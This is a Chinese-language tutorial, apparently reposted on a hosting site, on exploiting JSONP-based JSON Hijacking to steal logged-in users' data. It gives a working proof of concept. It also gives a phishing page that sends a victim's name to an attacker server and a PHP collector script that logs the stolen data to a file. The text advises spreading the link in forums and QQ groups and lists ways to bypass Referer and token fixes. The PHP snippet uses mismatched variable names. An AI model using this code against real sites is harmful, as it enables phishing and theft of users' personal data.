您好,登錄后才能下訂單哦!
這篇文章將為大家詳細(xì)講解有關(guān)如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個(gè)參考,希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。
JSON Hijacking漏洞的詳細(xì)利用,有點(diǎn)類似與CSRF,不過(guò)原理利用方式不同,在這邊文章我著重講解json跨域劫持的利用環(huán)境搭建與方式。
一般挖掘的過(guò)程中,burpsuite代理的History做尋找,過(guò)濾多余不可能存在漏洞的一些鏈接,如下圖所示:
我們?cè)诜祷匕衘son格式發(fā)現(xiàn)了如下的敏感信息(用戶Id,用戶名,用戶手機(jī)號(hào)碼)。
提交漏洞,poc在眾測(cè)時(shí)要爭(zhēng)分奪秒,所以這邊用了最精簡(jiǎn)的一個(gè)POC。
假如返回的數(shù)據(jù)為:
txf({"data":{"name":"唐曉峰"}});
<html>
<head>
<script>
function txf(a){
alert(a.data.name);
}
</script>
<script src=http://***.***.**/wm/User/getUserInfo?callback=txf></script>
</body>
</html>
即可如下彈窗:
1.準(zhǔn)備一臺(tái)web服務(wù)器,我直接phpstudy搭的。
附上服務(wù)器端的代碼
json.php
<?php $nickname=$_GET['name']; $fp = fopen('info.txt','a'); $flag = fwrite($fp, "名字: ".$name."\r\n"); ?><html>
釣魚.html
<head>
<title>txf</title>
<script>
var xmlhttp;
function txf(a)
{
xmlhttp=new XMLHttpRequest()
var x="http://***.***.***/json.php?name="+a.data.name;
xmlhttp.open("GET", x, true);
xmlhttp.send();
}
</script>>
<script src=http://***.***.***?callback=txf></script>
</head>
<body>
<textarea>釣魚啦,傻瓜</textarea>>
</body>
</html>
把釣魚鏈接http://***.***.***/釣魚.html發(fā)給該網(wǎng)站已登陸的用戶,如論壇,社區(qū)QQ群,社區(qū)貼吧等,服務(wù)端即可獲取到大量用戶敏感數(shù)據(jù)。
這邊以hackone的一個(gè)項(xiàng)目為例:
因?yàn)檫@個(gè)例子是小伙伴發(fā)過(guò)來(lái)的還沒(méi)修復(fù),所以都脫敏了,我們?cè)購(gòu)拈_(kāi)發(fā)修復(fù)的角度去思考如何繞過(guò)修復(fù)。
1.Referer白名單
子域名繞過(guò),文件名繞過(guò),空Referer繞過(guò)
2.增加token認(rèn)證
token足夠復(fù)雜或者服務(wù)端加密,我們無(wú)法繞過(guò),如果token很簡(jiǎn)單,如純數(shù)字,我們可以嘗試遍歷繞過(guò)
3.接口禁用
無(wú)敵的操作,無(wú)法繞過(guò)
關(guān)于如何進(jìn)行JSON Hijacking實(shí)戰(zhàn)利用就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。